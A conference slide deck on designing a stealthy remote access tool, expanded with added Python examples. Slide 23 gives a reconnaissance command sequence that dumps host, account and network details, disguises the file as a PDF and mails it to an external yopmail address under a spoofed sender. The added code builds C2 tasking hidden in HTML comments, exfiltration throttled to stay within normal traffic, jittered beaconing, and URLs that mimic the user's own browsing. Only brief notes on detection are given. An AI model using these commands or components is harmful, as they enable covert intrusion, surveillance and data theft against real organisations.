This talk surveys ways malicious code can look as much like normal users, behavior and traffic as possible. It demonstrates the limits of signature-based detection systems and then walks through a prototype Remote Access Tool (RAT) designed to blend in with normal activity.
Presented at CodeMash, January 8, 2014
1. Hiding in Plain Sight
Rob Gillen
@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.
2. Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
16. RAT Design
• Exe is dropped via infected page
• Queries web page for commands
• Performs commands if not done previously
• Periodically polls for new commands
17. Encryption
• Strong encryption is trivial to add: the primitives and libraries already exist
• PBKDF: scrypt, a sequential memory-hard function
• Many iterations (> 10K) for iteration-based KDFs such as PBKDF2; scrypt is tuned through its N/r/p cost parameters instead
• Long key lengths
18. Encryption Example
• The configuration shown on this slide (image not reproduced here) is custom-hardware resistant
– Takes approximately ¼ second per guess
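As an added example (not code from the deck), the following shows what the "PBKDF + long key" slides amount to in practice: scrypt stretches a password into a 256-bit key, the stored verifier is compared in constant time, and the per-guess cost measured on the host feeds a rough brute-force estimate. The N/r/p values are an assumption chosen so the block runs in milliseconds; the deck's ¼ second per guess needs a higher N than used here.

```python
import hashlib
import hmac
import os
import time

# scrypt cost parameters. The deck reports roughly 1/4 second per guess for
# the configuration on its (image-only) example slide; the values below are an
# assumption chosen so the example runs in a few milliseconds and stays under
# OpenSSL's default memory limit (scrypt needs about 128 * r * N bytes).
SCRYPT_N = 2 ** 14      # CPU/memory cost, must be a power of two
SCRYPT_R = 8            # block size parameter
SCRYPT_P = 1            # parallelisation parameter
KEY_LEN = 32            # 256-bit derived key


def derive_key(password: bytes, salt: bytes) -> bytes:
    """Stretch a password into a fixed-length key with scrypt."""
    return hashlib.scrypt(password, salt=salt, n=SCRYPT_N, r=SCRYPT_R,
                          p=SCRYPT_P, maxmem=64 * 1024 * 1024, dklen=KEY_LEN)


def new_verifier(password: bytes):
    """Return (salt, key) for a freshly salted password."""
    salt = os.urandom(16)
    return salt, derive_key(password, salt)


def check_password(password: bytes, salt: bytes, expected: bytes) -> bool:
    """Re-derive and compare in constant time so timing leaks nothing."""
    return hmac.compare_digest(derive_key(password, salt), expected)


def seconds_per_guess(samples: int = 3) -> float:
    """Measure the cost of one derivation on this machine."""
    salt = b"\x00" * 16
    start = time.perf_counter()
    for i in range(samples):
        derive_key(b"guess-%d" % i, salt)
    return (time.perf_counter() - start) / samples


def expected_crack_years(entropy_bits: float, secs_per_guess: float,
                         cores: int = 1) -> float:
    """Expected wall-clock years to recover a secret of the given entropy,
    assuming on average half the keyspace must be searched."""
    guesses = 2 ** entropy_bits / 2
    return guesses * secs_per_guess / cores / (365 * 24 * 3600)


if __name__ == "__main__":
    salt, key = new_verifier(b"correct horse battery staple")
    assert check_password(b"correct horse battery staple", salt, key)
    cost = seconds_per_guess()
    print(f"{cost * 1000:.1f} ms per guess on this host")
    for bits in (20, 40, 60):
        print(f"{bits}-bit secret, 1 core: "
              f"{expected_crack_years(bits, cost):.2e} years")
```

The point of the estimate is that a memory-hard KDF only buys time proportional to the entropy actually in the secret: at ¼ second per guess a 40-bit secret still falls in a few thousand core-years, a 20-bit one in a day, so the key length bullet matters as much as the cost parameters.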
19. Command/Control
• Use Web2C approach
– Commands are "issued" en masse via normal, benign-looking web pages
– Common ports
– Leverages existing HTML/server constructs
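The RAT Design slide (poll a page, run only what has not been run before) and the Web2C slide together describe a parsing loop, shown here as an added example that is not the deck's own code. The carrier format is an assumption: the deck does not say where in the page the commands live, so this version hides each task base64-encoded inside an HTML comment prefixed with a marker, which any web server and proxy already pass through untouched. The sample page is constructed for the example.

```python
import base64
import hashlib
from html.parser import HTMLParser

# Assumed carrier format (the deck does not specify one): each task is a
# base64 string inside an HTML comment that starts with this prefix.
MARKER = "w2c:"


class TaskExtractor(HTMLParser):
    """Collect decoded tasks from marked comments; ignore everything else."""

    def __init__(self):
        super().__init__()
        self.tasks = []

    def handle_comment(self, data):
        body = data.strip()
        if not body.startswith(MARKER):
            return
        try:
            raw = base64.b64decode(body[len(MARKER):], validate=True)
            self.tasks.append(raw.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            pass  # decoy or damaged comment: skip rather than execute garbage


def extract_tasks(page_html):
    """Client side: pull every well-formed task out of a fetched page."""
    parser = TaskExtractor()
    parser.feed(page_html)
    parser.close()
    return parser.tasks


def task_id(cmd):
    """Stable identifier so a task already executed is never repeated."""
    return hashlib.sha256(cmd.encode("utf-8")).hexdigest()[:16]


def pending_tasks(page_html, done):
    """Tasks on the page whose ids are not yet in the executed set."""
    return [c for c in extract_tasks(page_html) if task_id(c) not in done]


def embed_tasks(cmds):
    """Server side: a benign-looking page carrying the tasks (constructed sample).
    The trailing comment is a deliberate decoy that must be ignored."""
    comments = "\n".join(
        f"<!-- {MARKER}{base64.b64encode(c.encode('utf-8')).decode()} -->"
        for c in cmds)
    return f"""<!DOCTYPE html>
<html><head><title>Acme Widgets - News</title>
<!-- page generated by cms 2.1 -->
</head><body>
<h1>Company News</h1>
<p>Quarterly results are now available.</p>
{comments}
<!-- w2c:not base64!! -->
</body></html>"""


if __name__ == "__main__":
    page = embed_tasks(["ipconfig /all", "tasklist /v"])
    done = set()
    first = pending_tasks(page, done)      # first poll: both tasks
    done.update(task_id(c) for c in first)
    print("first poll :", first)
    print("second poll:", pending_tasks(page, done))   # nothing new
```

The executed set is what makes "performs commands if not done previously" work across polls; in a real implant it would have to survive restarts, and a defender looking at the page sees only comments, which is exactly why this traffic beats signature matching on the wire and has to be caught by who fetched the page and how often.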
23. Command Text
ipconfig /all > %APPDATA%info.txt
net start >> %APPDATA%info.txt
tasklist /v >> %APPDATA%info.txt
net user >> %APPDATA%info.txt
net localgroup administrators >> %APPDATA%info.txt
netstat -ano >> %APPDATA%info.txt
net use >> %APPDATA%info.txt
copy %APPDATA%info.txt %APPDATA%output.pdf
del %APPDATA%info.txt
sendmail %APPDATA%output.pdf Status Update "Jones, William E. wejones@yourorg.gov" itebaffe836@yopmail.com smtp.yourorg.gov
del %APPDATA%output.pdf
24. Mimic User Behavior
• Traffic rates
– Monitor incoming/outgoing network traffic for X days
– Configure exfil to stay within X% of "normal"
• C2
– Exponential/randomized stand-down
– Only communicate during periods of activity
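The two halves of this slide, a traffic budget derived from a monitoring window and a stand-down policy gated on user activity, are shown below as an added example that is not the deck's own code. The hourly baseline is a constructed sample standing in for the X days of observation; the X% budget, activity threshold and backoff constants are assumptions.

```python
import random

# Constructed baseline: average outbound bytes per hour-of-day for the host,
# as a monitor would collect it over X days (index = hour 0..23). Nights are
# near-idle; the working day carries almost all of the traffic.
BASELINE_OUT = ([2_000] * 7
                + [40_000, 600_000, 900_000, 850_000, 700_000, 400_000,
                   800_000, 900_000, 880_000, 600_000, 200_000]
                + [5_000] * 6)
assert len(BASELINE_OUT) == 24


def hourly_budget(baseline, hour, pct):
    """Extra bytes allowed in `hour` while staying within pct% of normal."""
    return int(baseline[hour] * pct / 100)


class ThrottledExfil:
    """Releases chunks only while the hour's extra traffic stays under budget;
    anything that does not fit is deferred rather than sent late at night."""

    def __init__(self, baseline, pct):
        self.baseline = baseline
        self.pct = pct
        self.sent = {}        # hour -> bytes already released this hour
        self.deferred = []    # (hour, nbytes) chunks that did not fit

    def try_send(self, hour, nbytes):
        used = self.sent.get(hour, 0)
        if used + nbytes > hourly_budget(self.baseline, hour, self.pct):
            self.deferred.append((hour, nbytes))
            return False
        self.sent[hour] = used + nbytes
        return True


def is_active(baseline, hour, min_bytes=50_000):
    """Only talk to C2 when the user normally generates traffic anyway
    (assumed threshold: a quiet hour is anything under 50 KB)."""
    return baseline[hour] >= min_bytes


def stand_down(attempt, base=60, cap=6 * 3600, rng=random):
    """Exponential backoff with full jitter: seconds to wait before the next
    poll. attempt 0 -> up to 60 s, 1 -> up to 120 s, ... capped at `cap`."""
    return rng.uniform(0, min(cap, base * 2 ** attempt))


def next_poll(baseline, hour, attempt, rng=random):
    """Delay before the next poll, or None if this hour is too quiet to risk it."""
    if not is_active(baseline, hour):
        return None
    return stand_down(attempt, rng=rng)


if __name__ == "__main__":
    rng = random.Random(2014)
    x = ThrottledExfil(BASELINE_OUT, pct=5)
    print("budget at 09:00 =", hourly_budget(BASELINE_OUT, 9, 5), "bytes")
    for hour, size in [(9, 30_000), (9, 20_000), (9, 15_000), (3, 500)]:
        print(f"{hour:02d}:00 send {size:>6} ->", x.try_send(hour, size))
    print("deferred:", x.deferred)
    for hour in (3, 10):
        print(f"{hour:02d}:00 poll delay:", next_poll(BASELINE_OUT, hour, 2, rng))
```

From the defender's side the throttle is the part that defeats volume-based alerts, but the baseline itself is observable: a host whose outbound bytes track its own historical curve within a few percent, including during a holiday, is a fingerprint worth hunting for.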
27. Mimic User Behavior
• Target URLs
– Monitor outgoing web queries/URLs for X days
– Use similar domain names for malicious traffic
– Append similar/same query strings to malicious requests
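As an added example, not part of the deck, the following profiles a log of observed outbound URLs and then builds a beacon URL that borrows the most common path shape and query keys, which is the "append similar/same query strings" bullet in code. It also includes the check a defender would run: path and query may blend in, but the destination host is still one the baseline has never seen. The observed URLs and hostnames are constructed samples; the C2 hostname is hypothetical.

```python
from collections import Counter
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed sample of outbound requests, as a monitor would log them over X days.
OBSERVED = [
    "https://www.example-news.com/articles/2014/01/08/story?id=4471&ref=home&utm_source=nl",
    "https://www.example-news.com/articles/2014/01/07/story?id=4466&ref=home",
    "https://cdn.example-news.com/assets/app.js?v=3.2.1",
    "https://www.example-news.com/search?q=codemash&page=2",
    "https://static.partner-widgets.net/track.gif?id=9912&ref=home&t=1389200000",
]


def shape(path):
    """Replace numeric segments with {n} so /articles/2014/01/08/story and
    /articles/2014/01/07/story collapse into one template."""
    return "/".join("{n}" if seg.isdigit() else seg for seg in path.split("/"))


def profile(urls):
    """Tally hosts, path shapes and query keys from what the user already does."""
    hosts, paths, keys = Counter(), Counter(), Counter()
    for u in urls:
        parts = urlsplit(u)
        hosts[parts.netloc] += 1
        paths[shape(parts.path)] += 1
        for k, _ in parse_qsl(parts.query):
            keys[k] += 1
    return hosts, paths, keys


def mimic_url(c2_host, prof, fields):
    """Beacon URL on `c2_host` using the most common path template and the two
    most common query keys; `fields` (e.g. encoded beacon data) fill the slots
    in order, path first."""
    _, paths, keys = prof
    it = iter(fields)
    try:
        segs = []
        for seg in paths.most_common(1)[0][0].split("/"):
            segs.append(next(it) if seg == "{n}" else seg)
        query = [(k, next(it)) for k, _ in keys.most_common(2)]
    except StopIteration:
        raise ValueError("not enough fields to fill the path and query slots")
    return urlunsplit(("https", c2_host, "/".join(segs), urlencode(query), ""))


def looks_like_user_traffic(url, prof):
    """Attacker's self-check: path template and every query key are ones the
    user's own browsing already produces."""
    _, paths, keys = prof
    parts = urlsplit(url)
    return shape(parts.path) in paths and all(k in keys for k, _ in parse_qsl(parts.query))


def host_seen(url, prof):
    """Defender's check: a request whose shape blends in still goes to a host
    the baseline never contacted."""
    hosts, _, _ = prof
    return urlsplit(url).netloc in hosts


if __name__ == "__main__":
    prof = profile(OBSERVED)
    beacon = mimic_url("news-example.com", prof, ["2014", "01", "09", "4480", "home"])
    print("beacon      :", beacon)
    print("blends in   :", looks_like_user_traffic(beacon, prof))
    print("host in base:", host_seen(beacon, prof))
```

The same Counter of hostnames is the cheapest detection for this technique: anything a proxy log shows to a never-before-seen domain, from a host that otherwise reproduces its own browsing patterns, deserves a second look regardless of how ordinary the URL appears.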